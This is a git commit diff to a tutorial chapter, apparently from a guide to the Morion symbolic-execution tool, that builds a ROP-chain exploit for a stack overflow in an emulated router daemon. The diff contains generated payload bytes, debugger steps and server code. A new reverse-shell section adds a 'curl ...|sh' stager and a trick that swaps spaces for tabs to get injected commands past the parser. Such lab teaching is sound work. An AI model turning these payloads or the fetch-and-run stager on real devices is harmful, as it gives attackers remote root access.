Update section Exploitation

This commit is contained in:
Damian Pfammatter
2024-05-02 10:16:53 +02:00
parent 69d7c46c16
commit abd6efc591
+158 -150
View File
@@ -17,6 +17,7 @@
2. [Analysis Module morion_rop_generator](./6_exploitation.md#analysis-module-morion_rop_generator) 2. [Analysis Module morion_rop_generator](./6_exploitation.md#analysis-module-morion_rop_generator)
1. [Payload Generation](./6_exploitation.md#payload-generation-1) 1. [Payload Generation](./6_exploitation.md#payload-generation-1)
2. [Run PoC Exploit](./6_exploitation.md#run-poc-exploit-1) 2. [Run PoC Exploit](./6_exploitation.md#run-poc-exploit-1)
3. [Getting a Reverse Shell](./6_exploitation.md#getting-a-reverse-shell)
<!--TODO-------------------------------------------------------------------------------------------- <!--TODO--------------------------------------------------------------------------------------------
- [X] Can we integrate morion/circled.rop3.py to circled.server.py? - [X] Can we integrate morion/circled.rop3.py to circled.server.py?
- [X] Try out manual exploit - [X] Try out manual exploit
@@ -29,6 +30,7 @@
- [ ] Why do we have `var:s+0`? - [ ] Why do we have `var:s+0`?
- [ ] Recheck links [Symbolic Execution: Analysis Modules](./4_symbex.md#analysis-modules) - [ ] Recheck links [Symbolic Execution: Analysis Modules](./4_symbex.md#analysis-modules)
- [X] Update figure references (e.g. Figure 5.4) - [X] Update figure references (e.g. Figure 5.4)
- [ ] Morion README: Intended usage - crash triage
---------------------------------------------------------------------------------------------------> --------------------------------------------------------------------------------------------------->
# Exploitation # Exploitation
In this final chapter, we will show the usage of two **analysis modules** provided by In this final chapter, we will show the usage of two **analysis modules** provided by
@@ -431,13 +433,13 @@ pwndbg> continue
If the PoC exploit worked, you will find a file `/id` on the emulated router (System: If the PoC exploit worked, you will find a file `/id` on the emulated router (System:
[ARMHF Guest (chroot)](./1_setup.md#armhf-guest-system)) with the content `uid=0 gid=0(root)`. [ARMHF Guest (chroot)](./1_setup.md#armhf-guest-system)) with the content `uid=0 gid=0(root)`.
## Analysis Module morion_rop_generator ## Analysis Module morion_rop_generator
The above process to get a payload triggering the intended ROP chain is rather cumbersome, since we The above process of getting a payload for the intended ROP chain is rather cumbersome, since we
need to access register and/or memory ASTs manually to define the necessary model restrictions. That need to access register and memory ASTs manually, in order to define the required model
is where the module `morion_rop_generator` comes into play. restrictions. That is where the module `morion_rop_generator` comes into play.
### Payload Generation ### Payload Generation
Module `morion_rop_generator` allows us to define the intended ROP chain within the trace file Module `morion_rop_generator` allows us to define the intended ROP chain within the trace file and
`circled.yaml` and will do the rest automatically. For instance, we included the same ROP chain as does the rest automatically. For instance, we can include our ROP chain (depicted in Figure 6.1) in
depicted in Figure 6.1 in [circled.init.yaml](../morion/circled.init.yaml#L37) (named `default`): the file [circled.yaml](../morion/circled.init.yaml#L37) as shown below:
```yaml ```yaml
[...] [...]
ropchains: ropchains:
@@ -469,119 +471,128 @@ ropchains:
instruction: instruction:
['0x0000c9bc', 'b7 f2 ff eb', 'bl #0x94a0', 'Gadget 1.1'] ['0x0000c9bc', 'b7 f2 ff eb', 'bl #0x94a0', 'Gadget 1.1']
``` ```
The module `morion_rop_generator` is then run like shown in the next excerpt. The module first **Note**: A trace file can include different ROP chains, differentiated by name. The ROP chain
symbolically executes the recorded trace and then tries to transfer control to the specified ROP included in the above file, for instance, has the name `default`.
chain. For each instruction in the chain it loads the given preconditions, tries to solve them,
concretizes the found solution, symbolically executes the instruction and then proceeds with the As can be seen below, the module `morion_rop_generator` is run by giving the trace file and the name
next one. At the end of the chain, a potential payload is returned. of the intended ROP chain as command-line arguments. The module first symbolically executes the
recorded trace and then tries to transfer control to the specified ROP chain. For each instruction
in the ROP chain it then performs the following steps:
- **Load** instruction's preconditions
- **Solve** the loaded preconditions
- **Concretize** the solution if one is found
- **Execute** the instruction symbolically
If solutions for all the preconditions have been found and all instructions in the ROP chain have
been processed, corresponding payloads are dumped.
``` ```
$ morion_rop_generator circled.yaml default $ morion_rop_generator circled.yaml default
[...] [...]
[2024-04-16 14:16:04] [DEBG] 0x0000cf1c (ff df 8d e2): add sp, sp, #0x3fc [2024-05-02 07:52:51] [DEBG] 0x0000cf1c (ff df 8d e2): add sp, sp, #0x3fc #
[2024-04-16 14:16:04] [DEBG] 0x0000cf20 (03 db 8d e2): add sp, sp, #0xc00 [2024-05-02 07:52:51] [DEBG] 0x0000cf20 (03 db 8d e2): add sp, sp, #0xc00 #
[2024-04-16 14:16:04] [INFO] ... finished symbolic execution (pc=0x0000cf24). [2024-05-02 07:52:51] [INFO] ... finished symbolic execution (pc=0x0000cf24).
[2024-04-16 14:16:04] [INFO] Start loading preconditions of instruction 0 in ROP chain 'default'... [2024-05-02 07:52:51] [INFO] Start loading preconditions of instruction 0 in ROP chain 'default'...
[2024-04-16 14:16:04] [DEBG] Regs: [2024-05-02 07:52:51] [DEBG] Regs:
[2024-04-16 14:16:04] [DEBG] Mems: [2024-05-02 07:52:51] [DEBG] Mems:
[2024-04-16 14:16:04] [DEBG] 0xbeffc84c == 0xb8 [2024-05-02 07:52:51] [DEBG] 0xbeffc84c == 0xb8
[2024-04-16 14:16:04] [DEBG] 0xbeffc84d == 0xc9 [2024-05-02 07:52:51] [DEBG] 0xbeffc84d == 0xc9
[2024-04-16 14:16:04] [DEBG] 0xbeffc84e == 0x00 [2024-05-02 07:52:51] [DEBG] 0xbeffc84e == 0x00
[2024-04-16 14:16:04] [DEBG] 0xbeffc84f == 0x00 [2024-05-02 07:52:51] [DEBG] 0xbeffc84f == 0x00
[2024-04-16 14:16:04] [INFO] ... finished loading preconditions of instruction 0 in ROP chain 'default'. [2024-05-02 07:52:51] [INFO] ... finished loading preconditions of instruction 0 in ROP chain 'default'.
[2024-04-16 14:16:04] [INFO] Start solving preconditions of instruction 0 in ROP chain 'default'... [2024-05-02 07:52:51] [INFO] Start solving preconditions of instruction 0 in ROP chain 'default'...
[2024-04-16 14:16:04] [DEBG] Solution: [2024-05-02 07:52:51] [DEBG] Solution:
[2024-04-16 14:16:04] [DEBG] 0xbeffc24c: 0xb8 [inst:5132][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+392] [2024-05-02 07:52:51] [DEBG] 0xbeffc24c: 0xb8 [inst:5132][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+392]
[2024-04-16 14:16:04] [DEBG] 0xbeffc24d: 0xc9 [inst:5132][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+393] [2024-05-02 07:52:51] [DEBG] 0xbeffc24d: 0xc9 [inst:5132][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+393]
[2024-04-16 14:16:04] [DEBG] 0xbeffc24e: 0x00 [inst:5132][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+394] [2024-05-02 07:52:51] [DEBG] 0xbeffc24e: 0x00 [inst:5132][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+394]
[2024-04-16 14:16:04] [DEBG] 0xbeffc24f: 0x00 [inst:5132][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+395] [2024-05-02 07:52:51] [DEBG] 0xbeffc24f: 0x00 [inst:5132][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+395]
[2024-04-16 14:16:04] [DEBG] 0xbeffc0c4: 0xff [inst:15451][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+0] [2024-05-02 07:52:51] [DEBG] 0xbeffc0c4: 0xff [inst:15451][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+0]
[2024-04-16 14:16:04] [INFO] ... finished solving preconditions of instruction 0 in ROP chain 'default'. [2024-05-02 07:52:51] [INFO] ... finished solving preconditions of instruction 0 in ROP chain 'default'.
[2024-04-16 14:16:04] [INFO] Start concretizing preconditions of instruction 0 in ROP chain 'default'... [2024-05-02 07:52:51] [INFO] Start concretizing preconditions of instruction 0 in ROP chain 'default'...
[2024-04-16 14:16:04] [DEBG] Regs: [2024-05-02 07:52:51] [DEBG] Regs:
[2024-04-16 14:16:04] [DEBG] Mems: [2024-05-02 07:52:51] [DEBG] Mems:
[2024-04-16 14:16:04] [DEBG] 0xbeffc84c: 0xb8 [2024-05-02 07:52:51] [DEBG] 0xbeffc84c: 0xb8
[2024-04-16 14:16:04] [DEBG] 0xbeffc84d: 0xc9 [2024-05-02 07:52:51] [DEBG] 0xbeffc84d: 0xc9
[2024-04-16 14:16:04] [DEBG] 0xbeffc84e: 0x00 [2024-05-02 07:52:51] [DEBG] 0xbeffc84e: 0x00
[2024-04-16 14:16:04] [DEBG] 0xbeffc84f: 0x00 [2024-05-02 07:52:51] [DEBG] 0xbeffc84f: 0x00
[2024-04-16 14:16:04] [INFO] ... finished concretizing preconditions of instruction 0 in ROP chain 'default'... [2024-05-02 07:52:51] [INFO] ... finished concretizing preconditions of instruction 0 in ROP chain 'default'...
[2024-04-16 14:16:04] [INFO] Start symbolic execution of instruction 0 in ROP chain 'default'... [2024-05-02 07:52:51] [INFO] Start symbolic execution of instruction 0 in ROP chain 'default'...
[2024-04-16 14:16:04] [DEBG] 0x0000cf24 (f0 8f bd e8): pop {r4, r5, r6, r7, r8, sb, sl, fp, pc}# Gadget 0.0 [2024-05-02 07:52:51] [DEBG] 0x0000cf24 (f0 8f bd e8): pop {r4, r5, r6, r7, r8, sb, sl, fp, pc}# Gadget 0.0
[2024-04-16 14:16:04] [INFO] ... finished symbolic execution of instruction 0 in ROP chain 'default'. [2024-05-02 07:52:51] [INFO] ... finished symbolic execution of instruction 0 in ROP chain 'default'.
[2024-04-16 14:16:04] [INFO] Start loading preconditions of instruction 1 in ROP chain 'default'... [2024-05-02 07:52:51] [INFO] Start loading preconditions of instruction 1 in ROP chain 'default'...
[2024-04-16 14:16:04] [DEBG] Regs: [2024-05-02 07:52:51] [DEBG] Regs:
[2024-04-16 14:16:04] [DEBG] Mems: [2024-05-02 07:52:51] [DEBG] Mems:
[2024-04-16 14:16:04] [INFO] ... finished loading preconditions of instruction 1 in ROP chain 'default'. [2024-05-02 07:52:51] [INFO] ... finished loading preconditions of instruction 1 in ROP chain 'default'.
[2024-04-16 14:16:04] [INFO] Start solving preconditions of instruction 1 in ROP chain 'default'... [2024-05-02 07:52:51] [INFO] Start solving preconditions of instruction 1 in ROP chain 'default'...
[2024-04-16 14:16:04] [DEBG] Instruction 1 of ROP chain 'default' has no preconditions. [2024-05-02 07:52:51] [DEBG] Instruction 1 of ROP chain 'default' has no preconditions.
[2024-04-16 14:16:04] [INFO] ... finished solving preconditions of instruction 1 in ROP chain 'default'. [2024-05-02 07:52:51] [INFO] ... finished solving preconditions of instruction 1 in ROP chain 'default'.
[2024-04-16 14:16:04] [INFO] Start concretizing preconditions of instruction 1 in ROP chain 'default'... [2024-05-02 07:52:51] [INFO] Start concretizing preconditions of instruction 1 in ROP chain 'default'...
[2024-04-16 14:16:04] [DEBG] Regs: [2024-05-02 07:52:51] [DEBG] Regs:
[2024-04-16 14:16:04] [DEBG] Mems: [2024-05-02 07:52:51] [DEBG] Mems:
[2024-04-16 14:16:04] [INFO] ... finished concretizing preconditions of instruction 1 in ROP chain 'default'... [2024-05-02 07:52:51] [INFO] ... finished concretizing preconditions of instruction 1 in ROP chain 'default'...
[2024-04-16 14:16:04] [INFO] Start symbolic execution of instruction 1 in ROP chain 'default'... [2024-05-02 07:52:51] [INFO] Start symbolic execution of instruction 1 in ROP chain 'default'...
[2024-04-16 14:16:04] [DEBG] 0x0000c9b8 (06 00 a0 e1): mov r0, r6 # Gadget 1.0 [2024-05-02 07:52:51] [DEBG] 0x0000c9b8 (06 00 a0 e1): mov r0, r6 # Gadget 1.0
[2024-04-16 14:16:04] [INFO] ... finished symbolic execution of instruction 1 in ROP chain 'default'. [2024-05-02 07:52:51] [INFO] ... finished symbolic execution of instruction 1 in ROP chain 'default'.
[2024-04-16 14:16:04] [INFO] Start loading preconditions of instruction 2 in ROP chain 'default'... [2024-05-02 07:52:51] [INFO] Start loading preconditions of instruction 2 in ROP chain 'default'...
[2024-04-16 14:16:04] [DEBG] Regs: [2024-05-02 07:52:51] [DEBG] Regs:
[2024-04-16 14:16:04] [DEBG] r0 == 0xbeffc290 [2024-05-02 07:52:51] [DEBG] r0 == 0xbeffc250
[2024-04-16 14:16:04] [DEBG] Mems: [2024-05-02 07:52:51] [DEBG] Mems:
[2024-04-16 14:16:04] [DEBG] 0xbeffc290 == 0x69 [2024-05-02 07:52:51] [DEBG] 0xbeffc250 == 0x69
[2024-04-16 14:16:04] [DEBG] 0xbeffc291 == 0x64 [2024-05-02 07:52:51] [DEBG] 0xbeffc251 == 0x64
[2024-04-16 14:16:04] [DEBG] 0xbeffc292 == 0x3e [2024-05-02 07:52:51] [DEBG] 0xbeffc252 == 0x3e
[2024-04-16 14:16:04] [DEBG] 0xbeffc293 == 0x2f [2024-05-02 07:52:51] [DEBG] 0xbeffc253 == 0x2f
[2024-04-16 14:16:04] [DEBG] 0xbeffc294 == 0x69 [2024-05-02 07:52:51] [DEBG] 0xbeffc254 == 0x69
[2024-04-16 14:16:04] [DEBG] 0xbeffc295 == 0x64 [2024-05-02 07:52:51] [DEBG] 0xbeffc255 == 0x64
[2024-04-16 14:16:04] [DEBG] 0xbeffc296 == 0x3b [2024-05-02 07:52:51] [DEBG] 0xbeffc256 == 0x3b
[2024-04-16 14:16:04] [DEBG] 0xbeffc297 == 0x23 [2024-05-02 07:52:51] [DEBG] 0xbeffc257 == 0x23
[2024-04-16 14:16:04] [DEBG] 0xbeffc298 == 0x00 [2024-05-02 07:52:51] [DEBG] 0xbeffc258 == 0x00
[2024-04-16 14:16:04] [INFO] ... finished loading preconditions of instruction 2 in ROP chain 'default'. [2024-05-02 07:52:51] [INFO] ... finished loading preconditions of instruction 2 in ROP chain 'default'.
[2024-04-16 14:16:04] [INFO] Start solving preconditions of instruction 2 in ROP chain 'default'... [2024-05-02 07:52:51] [INFO] Start solving preconditions of instruction 2 in ROP chain 'default'...
[2024-04-16 14:16:04] [DEBG] Solution: [2024-05-02 07:52:51] [DEBG] Solution:
[2024-04-16 14:16:04] [DEBG] 0xbeffc234: 0x90 [inst:5132][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+368] [2024-05-02 07:52:51] [DEBG] 0xbeffc234: 0x50 [inst:5132][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+368]
[2024-04-16 14:16:04] [DEBG] 0xbeffc235: 0xc2 [inst:5132][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+369] [2024-05-02 07:52:51] [DEBG] 0xbeffc235: 0xc2 [inst:5132][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+369]
[2024-04-16 14:16:04] [DEBG] 0xbeffc236: 0xff [inst:5132][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+370] [2024-05-02 07:52:51] [DEBG] 0xbeffc236: 0xff [inst:5132][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+370]
[2024-04-16 14:16:04] [DEBG] 0xbeffc237: 0xbe [inst:5132][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+371] [2024-05-02 07:52:51] [DEBG] 0xbeffc237: 0xbe [inst:5132][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+371]
[2024-04-16 14:16:04] [DEBG] 0xbeffc24c: 0xb8 [inst:5132][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+392] [2024-05-02 07:52:51] [DEBG] 0xbeffc24c: 0xb8 [inst:5132][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+392]
[2024-04-16 14:16:04] [DEBG] 0xbeffc24d: 0xc9 [inst:5132][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+393] [2024-05-02 07:52:51] [DEBG] 0xbeffc24d: 0xc9 [inst:5132][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+393]
[2024-04-16 14:16:04] [DEBG] 0xbeffc24e: 0x00 [inst:5132][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+394] [2024-05-02 07:52:51] [DEBG] 0xbeffc24e: 0x00 [inst:5132][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+394]
[2024-04-16 14:16:04] [DEBG] 0xbeffc24f: 0x00 [inst:5132][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+395] [2024-05-02 07:52:51] [DEBG] 0xbeffc24f: 0x00 [inst:5132][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+395]
[2024-04-16 14:16:04] [DEBG] 0xbeffc0c4: 0xff [inst:15451][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+0] [2024-05-02 07:52:51] [DEBG] 0xbeffc0c4: 0xff [inst:15451][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+0]
[2024-04-16 14:16:04] [DEBG] 0xbeffc290: 0x69 [inst:15451][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+460] [2024-05-02 07:52:51] [DEBG] 0xbeffc250: 0x69 [inst:15451][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+396]
[2024-04-16 14:16:04] [DEBG] 0xbeffc291: 0x64 [inst:15451][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+461] [2024-05-02 07:52:51] [DEBG] 0xbeffc251: 0x64 [inst:15451][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+397]
[2024-04-16 14:16:04] [DEBG] 0xbeffc292: 0x3e [inst:15451][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+462] [2024-05-02 07:52:51] [DEBG] 0xbeffc252: 0x3e [inst:15451][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+398]
[2024-04-16 14:16:04] [DEBG] 0xbeffc293: 0x2f [inst:15451][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+463] [2024-05-02 07:52:51] [DEBG] 0xbeffc253: 0x2f [inst:15451][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+399]
[2024-04-16 14:16:04] [DEBG] 0xbeffc294: 0x69 [inst:15451][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+464] [2024-05-02 07:52:51] [DEBG] 0xbeffc254: 0x69 [inst:15451][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+400]
[2024-04-16 14:16:04] [DEBG] 0xbeffc295: 0x64 [inst:15451][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+465] [2024-05-02 07:52:51] [DEBG] 0xbeffc255: 0x64 [inst:15451][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+401]
[2024-04-16 14:16:04] [DEBG] 0xbeffc296: 0x3b [inst:15451][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+466] [2024-05-02 07:52:51] [DEBG] 0xbeffc256: 0x3b [inst:15451][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+402]
[2024-04-16 14:16:04] [DEBG] 0xbeffc297: 0x23 [inst:15451][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+467] [2024-05-02 07:52:51] [DEBG] 0xbeffc257: 0x23 [inst:15451][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+403]
[2024-04-16 14:16:04] [DEBG] 0xbeffc298: 0x00 [inst:15451][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+468] [2024-05-02 07:52:51] [DEBG] 0xbeffc258: 0x00 [inst:15451][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+404]
[2024-04-16 14:16:04] [INFO] ... finished solving preconditions of instruction 2 in ROP chain 'default'. [2024-05-02 07:52:51] [INFO] ... finished solving preconditions of instruction 2 in ROP chain 'default'.
[2024-04-16 14:16:04] [INFO] Start concretizing preconditions of instruction 2 in ROP chain 'default'... [2024-05-02 07:52:51] [INFO] Start concretizing preconditions of instruction 2 in ROP chain 'default'...
[2024-04-16 14:16:04] [DEBG] Regs: [2024-05-02 07:52:51] [DEBG] Regs:
[2024-04-16 14:16:04] [DEBG] r0: 0xbeffc290 [2024-05-02 07:52:51] [DEBG] r0: 0xbeffc250
[2024-04-16 14:16:04] [DEBG] Mems: [2024-05-02 07:52:51] [DEBG] Mems:
[2024-04-16 14:16:04] [DEBG] 0xbeffc290: 0x69 [2024-05-02 07:52:51] [DEBG] 0xbeffc250: 0x69
[2024-04-16 14:16:04] [DEBG] 0xbeffc291: 0x64 [2024-05-02 07:52:51] [DEBG] 0xbeffc251: 0x64
[2024-04-16 14:16:04] [DEBG] 0xbeffc292: 0x3e [2024-05-02 07:52:51] [DEBG] 0xbeffc252: 0x3e
[2024-04-16 14:16:04] [DEBG] 0xbeffc293: 0x2f [2024-05-02 07:52:51] [DEBG] 0xbeffc253: 0x2f
[2024-04-16 14:16:04] [DEBG] 0xbeffc294: 0x69 [2024-05-02 07:52:51] [DEBG] 0xbeffc254: 0x69
[2024-04-16 14:16:04] [DEBG] 0xbeffc295: 0x64 [2024-05-02 07:52:51] [DEBG] 0xbeffc255: 0x64
[2024-04-16 14:16:04] [DEBG] 0xbeffc296: 0x3b [2024-05-02 07:52:51] [DEBG] 0xbeffc256: 0x3b
[2024-04-16 14:16:04] [DEBG] 0xbeffc297: 0x23 [2024-05-02 07:52:51] [DEBG] 0xbeffc257: 0x23
[2024-04-16 14:16:04] [DEBG] 0xbeffc298: 0x00 [2024-05-02 07:52:51] [DEBG] 0xbeffc258: 0x00
[2024-04-16 14:16:04] [INFO] ... finished concretizing preconditions of instruction 2 in ROP chain 'default'... [2024-05-02 07:52:51] [INFO] ... finished concretizing preconditions of instruction 2 in ROP chain 'default'...
[2024-04-16 14:16:04] [INFO] Start symbolic execution of instruction 2 in ROP chain 'default'... [2024-05-02 07:52:51] [INFO] Start symbolic execution of instruction 2 in ROP chain 'default'...
[2024-04-16 14:16:04] [DEBG] 0x0000c9bc (b7 f2 ff eb): bl #0x94a0 # Gadget 1.1 [2024-05-02 07:52:51] [DEBG] 0x0000c9bc (b7 f2 ff eb): bl #0x94a0 # Gadget 1.1
[2024-04-16 14:16:04] [INFO] ... finished symbolic execution of instruction 2 in ROP chain 'default'. [2024-05-02 07:52:51] [INFO] ... finished symbolic execution of instruction 2 in ROP chain 'default'.
[2024-04-16 14:16:04] [INFO] Start storing file 'circled.yaml'... [2024-05-02 07:52:51] [INFO] Start storing file 'circled.yaml'...
[2024-04-16 14:16:06] [INFO] ... finished storing file 'circled.yaml'. [2024-05-02 07:52:53] [INFO] ... finished storing file 'circled.yaml'.
[2024-04-16 14:16:06] [INFO] Start dumping payloads... [2024-05-02 07:52:53] [INFO] Start dumping payloads...
Payload [inst:5132][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+0]: Payload [inst:5132][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+0]:
s+0000: 41 41 41 41 41 41 41 41 s+0000: 41 41 41 41 41 41 41 41
[...] [...]
s+0360: 41 41 41 41 41 41 41 41 s+0360: 41 41 41 41 41 41 41 41
s+0368: 90 c2 ff be 42 42 42 42 s+0368: 50 c2 ff be 42 42 42 42
s+0376: 42 42 42 42 42 42 42 42 s+0376: 42 42 42 42 42 42 42 42
s+0384: 42 42 42 42 42 42 42 42 s+0384: 42 42 42 42 42 42 42 42
s+0392: b8 c9 00 00 s+0392: b8 c9 00 00
@@ -590,34 +601,31 @@ Payload [inst:15451][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][
s+0000: ff 43 43 43 43 43 43 43 s+0000: ff 43 43 43 43 43 43 43
s+0008: 43 43 43 43 43 43 43 43 s+0008: 43 43 43 43 43 43 43 43
[...] [...]
s+0448: 43 43 43 43 43 43 43 43 s+0384: 43 43 43 43 43 43 43 43
s+0456: 43 43 43 43 69 64 3e 2f s+0392: 43 43 43 43 69 64 3e 2f
s+0464: 69 64 3b 23 00 s+0400: 69 64 3b 23 00
--- ---
[2024-04-16 14:16:06] [INFO] ... finished dumping payloads. [2024-05-02 07:52:53] [INFO] ... finished dumping payloads.
``` ```
Since `fgets` was called twice in our trace (at trace instructions 5132 and 15451) the module In our specific trace, all symbolic variables are introduced by function `fgets`, which, if you
returns two payloads, which however originate from reading the same file (`circleinfo.txt`). We remember the discussions in [Vulnerability: Analysis](./5_vulnerability.md#analysis), is called
therefore need to merge them so a single one. As before, we added the resulting payload to twice (corresponding to trace instructions 5132 and 15451). For each of these calls,
[circled.server.py](../server/circled.server.py#L57), which serves it when started with command-line `morion_rop_generator` returns an individual payload. Since in our case these originate from the
argument `--payload "poc2"`. same read file (`circleinfo.txt`), what by the way is also confirmed by the same file stream
(`0x21ae0`), we can simply merge the payloads together to a single one. As before, we added the
resulting payload to [circled.server.py](../server/circled.server.py#L57), which serves it when
started with command-line argument `--payload "poc2"`.
```python ```python
[...] [...]
# Serve requests for circleinfo.txt # Serve requests for circleinfo.txt
[...] [...]
elif payload == "poc2": elif payload == "poc2":
p = bytearray([ p = bytearray([
0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41, 0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,
[...] [...]
0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41, 0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,
0x90,0xc2,0xff,0xbe,0x42,0x42,0x42,0x42, 0x50,0xc2,0xff,0xbe,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,
0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42, 0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0xb8,0xc9,0x00,0x00,0x69,0x64,0x3e,0x2f,
0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,
0xb8,0xc9,0x00,0x00,0x43,0x43,0x43,0x43,
0x43,0x43,0x43,0x43,0x43,0x43,0x43,0x43,
[...]
0x43,0x43,0x43,0x43,0x43,0x43,0x43,0x43,
0x43,0x43,0x43,0x43,0x69,0x64,0x3e,0x2f,
0x69,0x64,0x3b,0x23,0x00 0x69,0x64,0x3b,0x23,0x00
]) ])
[...] [...]
@@ -658,37 +666,25 @@ pwndbg> stepi
[...] [...]
pwndbg> x/s $r6 pwndbg> x/s $r6
0xbeffc290: "id>/id;#" 0xbeffc250: "id>/id;#"
pwndbg> continue pwndbg> continue
[...] [...]
``` ```
If the PoC exploit worked, you will find a file `/id` on the emulated router (System: If the PoC exploit worked, you will find a file `/id` on the emulated router (System:
[ARMHF Guest (chroot)](./1_setup.md#armhf-guest-system)) with the content `uid=0 gid=0(root)`. [ARMHF Guest (chroot)](./1_setup.md#armhf-guest-system)) with the content `uid=0 gid=0(root)`.
## Getting a Reverse Shell
## TODO Given the information we learned so far, it is a rather simple task to run the PoC payload into a
- Explain `circled.server.py` more powerful one, e.g. opening us a reverse shell on the targeted devices. File
- Test reverse shell payload [circled.server.py](../server/circled.server.py#L120) implements this and serves the corresponding
- Explain reverse shell payload payload when running with command-line argument `--payload "rsh"`.
- Add screencast
[circled.server.py](../server/circled.server.py#L42)
```python ```python
[...] [...]
# Serve requests for circleinfo.txt # Serve requests for circleinfo.txt
if payload == "leg": [...]
return self.serve_file("resources/circleinfo.txt")
elif payload == "pov":
return b"A"*1021 + b" X"
elif payload == "poc1":
p = [...]
return p
elif payload == "poc2":
p = [...]
return p
elif payload == "rsh": elif payload == "rsh":
cmd = "curl http://127.0.0.1:5000/stage1|sh" cmd = "curl http://127.0.0.1:5000/stage1|sh"
else: [...]
cmd = payload
# Replace spaces in the command (spaces cannot be used due to sscanf(str, "%s %s")) # Replace spaces in the command (spaces cannot be used due to sscanf(str, "%s %s"))
cmd = "touch$\t/tmp/st0;" + cmd.replace(" ", "\t") + ";#" cmd = "touch$\t/tmp/st0;" + cmd.replace(" ", "\t") + ";#"
@@ -724,11 +720,23 @@ HttpHandler.cmd_addr = cmd_addr - 0x1000
return payload return payload
[...] [...]
``` ```
## TODO
- Explain `circled.server.py`
- Test reverse shell payload
- Explain reverse shell payload
- Add screencast
We fill up with a nonexistent command `X...X;cmd` to improve ASLR brute-forcing? We fill up with a nonexistent command `X...X;cmd` to improve ASLR brute-forcing?
- Note: The shown exploit could easily be generated without using symbolic execution. However, we - Note: The shown exploit could easily be generated without using symbolic execution. However, we
have chosen it since it is rather easy to follow along and suitable to explain how Morion works. have chosen it since it is rather easy to follow along and suitable to explain how Morion works.
- Conclusions
- Well-known and rather simple to exploit vulnerability class (stack buffer overflow)
- Exploitation of others might be harder to automate with symbolic execution (heap overflows, race conditions, etc.)
- A lot open challenges regarding environment modeling / (semantic) function modeling (see my presentations)
